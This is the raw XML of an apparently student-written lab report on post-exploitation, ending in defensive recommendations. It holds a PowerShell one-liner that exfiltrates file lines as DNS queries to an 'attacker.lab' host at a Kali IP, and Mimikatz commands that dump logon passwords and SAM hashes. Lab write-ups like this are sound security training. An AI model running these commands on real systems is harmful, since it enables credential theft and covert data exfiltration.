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1A49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354D26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8B2959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1B3C60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56DEC3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CDA825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474B99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1BD8E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F8BC4C0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FEB941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6C4C2F3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Post-Exploitation and Exfiltration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AB54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645C8FE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53F5C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9A8753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9B7313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2BF8F5F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56AEF55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05AC36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8E72BE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C9D8D62">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE0F4B1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74231472">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1FAB0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 w14:paraId="6AC3C5DB">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="righ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_Toc2104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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2104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60B02D2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_Toc2720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Tools</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2720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1BD6754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_Toc4889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Data Exfiltration via DNS tunneling</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4889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B3A2881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_Toc32143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Credential Dumping with Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32143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88642F3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_Toc22972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Findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc22972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B1F1128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_Toc15607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Recommendations</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc15607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000001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fldChar w:fldCharType="end"/>
      </w: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 w14:paraId="7BE2C51C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\t "Heading 4" \h \c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_Toc6362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file being created and data being sent to kali through powershell</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6362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75265D2F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_Toc1218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Data collected at kali</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1218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0073097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_Toc23187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mimikatz commands being executed</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23187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0000018">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B4DFA"/>
    <w:p w14:paraId="2A619699"/>
    <w:p w14:paraId="7B163DB9"/>
    <w:p w14:paraId="447BE602"/>
    <w:p w14:paraId="5A651A2B"/>
    <w:p w14:paraId="62E579DA"/>
    <w:p w14:paraId="6686E2E3"/>
    <w:p w14:paraId="5D1FDD90">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DC1BBC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44182391">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C20B87">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7478C642">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C80987">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6796E8C5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A426370">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0954040B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3754376E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0" w:name="_Toc2104"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5EDC539E">
      <w:pPr>
        <w:ind w:left="480" w:leftChars="20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The goal of this phase was to simulate post-exploitation activities in a controlled lab environment, specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F084C39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="14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Extracting credentials from a compromised Windows VM using Mimikatz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315F95C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="14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Simulating data exfiltration via DNS tunneling using mock sensitive data, with a Kali VM acting as the attacker DNS server/sniffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB40BD7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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc2720"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412192A6">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="7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Mimikatz, nslookup, PowerShell</w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5928EE8A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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc4889"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Data Exfiltration via DNS tunneling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="01187706"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 xml:space="preserve">Step 1 : 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create a test file as sensitive_data.txt and add the following contents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59B957">
      <w:pPr>
        <w:ind w:left="2160" w:left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payroll2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BE420">
      <w:pPr>
        <w:ind w:left="2160" w:left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employee123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB28B7E">
      <w:pPr>
        <w:ind w:left="2160" w:left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finance_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1058E">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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2: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Now try sending the .txt file  to kali machine from windows PowerShell  simultaneously on kali side run tcpdump command : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A307D">
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default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sudo tcpdump -i eth0 udp port 53 -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E1A926"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Commands on PowerShell: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE9721">
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="30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Get-Content C:\Users\&lt;you&gt;\Desktop\sensitive_data.txt | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C072225">
      <w:pPr>
        <w:ind w:left="2160" w:leftChars="0"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 xml:space="preserve">    nslookup "$_.attacker.lab" 192.168.1.43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD22B0"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5795" cy="2077720"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10160"/>
            <wp:docPr id="2" name="Picture 2" descr="1creat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create fi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BEE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center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3" w:name="_Toc636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file being created and data being sent to kali through powershell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="173E389F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1048D421"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5795" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13335"/>
            <wp:docPr id="7" name="Picture 7" descr="caught in tcpd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ught in tcpdu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C16E">
      <w:pPr>
        <w:pStyle w:val="5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4" w:name="_Toc1218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Data collected at kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="69E433EB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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc32143"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Credential Dumping with Mimikatz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="64F7BEF5"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>Step 1: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Download Mimikatz from official GitHub releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D96CAE"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cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: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Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mimikatz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as Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAD26F8">
      <w:pPr>
        <w:ind w:left="1440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commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2067DF">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"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privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E2D50">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0"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sekurlsa::logonpasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A407A1">
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="72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lsadump::sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B9346"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30240" cy="2837180"/>
            <wp:effectExtent l="0" t="0" r="0" b="12700"/>
            <wp:docPr id="8" name="Picture 8" descr="ntlm ha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tlm hash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AF67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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5726430" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="10" name="Picture 10" descr="mimi after ntlm paste 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imi after ntlm paste thi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E94C">
      <w:pPr>
        <w:pStyle w:val="5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bookmarkStart w:id="6" w:name="_Toc23187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mimikatz commands being executed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="463C9AB8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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc22972"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="28FCDAA8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Credential dumping via Mimikatz successfully exposed NTLM hashes from the Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AB9AAD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DNS tunneling allowed mock sensitive data to leave the Windows VM and appear in attacker-controlled traffic captures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3740975C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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc15607"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="42147227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Restrict Administrative Privileges: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Prevent attackers from running tools like Mimikatz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08355EAC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Enable LSASS Protection:</w:t>
      </w:r>
      <w:r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Configure Credential Guard to block unauthorized memory dumps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9D9CD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Monitor DNS Traffic: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Detect abnormal queries (e.g., long/random subdomains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3FA14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Network Segmentation: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Limit internal hosts from direct DNS queries to external servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55900A72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Exfiltration Detection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: Use IDS/IPS and SIEM correlation to flag tunneling activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09916CFE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4378D216"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 w14:paraId="00A006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576" w:footer="43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jc w:val="center"/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2F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-671195</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-281305</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7788275" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="14605" b="12065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7788275" cy="1023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F5F6B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A28F5F6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BDCDC745"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BDCDC74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DA377702"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DA37770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04F7B257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04F7B2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D019E4"/>
    <w:rsid w:val="02017B58"/>
    <w:rsid w:val="023625B0"/>
    <w:rsid w:val="083D1794"/>
    <w:rsid w:val="08C94FF8"/>
    <w:rsid w:val="0A64181A"/>
    <w:rsid w:val="0C203DF5"/>
    <w:rsid w:val="0E880A3A"/>
    <w:rsid w:val="0E9512FB"/>
    <w:rsid w:val="16393EB4"/>
    <w:rsid w:val="1B217891"/>
    <w:rsid w:val="1E7110FB"/>
    <w:rsid w:val="1E93319C"/>
    <w:rsid w:val="213F068F"/>
    <w:rsid w:val="21B95DF1"/>
    <w:rsid w:val="229F7A26"/>
    <w:rsid w:val="25700DFA"/>
    <w:rsid w:val="2ADE5D52"/>
    <w:rsid w:val="2BB07A36"/>
    <w:rsid w:val="2C067F05"/>
    <w:rsid w:val="2D3F104B"/>
    <w:rsid w:val="2ED576A0"/>
    <w:rsid w:val="30CE7FA2"/>
    <w:rsid w:val="32134DB6"/>
    <w:rsid w:val="32A23217"/>
    <w:rsid w:val="33340711"/>
    <w:rsid w:val="354074ED"/>
    <w:rsid w:val="356928AF"/>
    <w:rsid w:val="40313E05"/>
    <w:rsid w:val="408F05F9"/>
    <w:rsid w:val="41C67479"/>
    <w:rsid w:val="42BE2BE5"/>
    <w:rsid w:val="451B3B9E"/>
    <w:rsid w:val="49E1738F"/>
    <w:rsid w:val="4BB77389"/>
    <w:rsid w:val="4DEC4CE8"/>
    <w:rsid w:val="4EC85950"/>
    <w:rsid w:val="4F1D2E5C"/>
    <w:rsid w:val="50770CC7"/>
    <w:rsid w:val="56237DE0"/>
    <w:rsid w:val="56B85F6D"/>
    <w:rsid w:val="597E7B62"/>
    <w:rsid w:val="59BE7110"/>
    <w:rsid w:val="5B21121A"/>
    <w:rsid w:val="5D17062D"/>
    <w:rsid w:val="61F26C63"/>
    <w:rsid w:val="624A4733"/>
    <w:rsid w:val="661A0911"/>
    <w:rsid w:val="6AE17565"/>
    <w:rsid w:val="6BE73308"/>
    <w:rsid w:val="6FCA424E"/>
    <w:rsid w:val="708966DF"/>
    <w:rsid w:val="716F4C2B"/>
    <w:rsid w:val="73B629EC"/>
    <w:rsid w:val="75DB288E"/>
    <w:rsid w:val="76101441"/>
    <w:rsid w:val="76FA5DB4"/>
    <w:rsid w:val="7CA10480"/>
    <w:rsid w:val="7D084EB2"/>
    <w:rsid w:val="7D274676"/>
    <w:rsid w:val="7D6E2658"/>
    <w:rsid w:val="7DE46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50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="24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after="50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50" w:after="50"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24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spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="24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2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table" w:customStyle="1" w:styleId="23">
    <w:name w:val="TableNormal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="WPSOffice手动目录 1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table" w:customStyle="1" w:styleId="27">
    <w:name w:val="_Style 12"/>
    <w:basedOn w:val="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4 Char"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/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314</Words>
  <Characters>1901</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2365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2025-07-26T00:07:00Z</dcterms:created>
  <dc:creator>Mohammed</dc:creator>
  <cp:lastModifiedBy>For Google</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-06T17:22:46Z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A5B3DD26B4184AD18A741BE05AB59C86_13</vt:lpwstr>
  </property>
</Properties>
</file>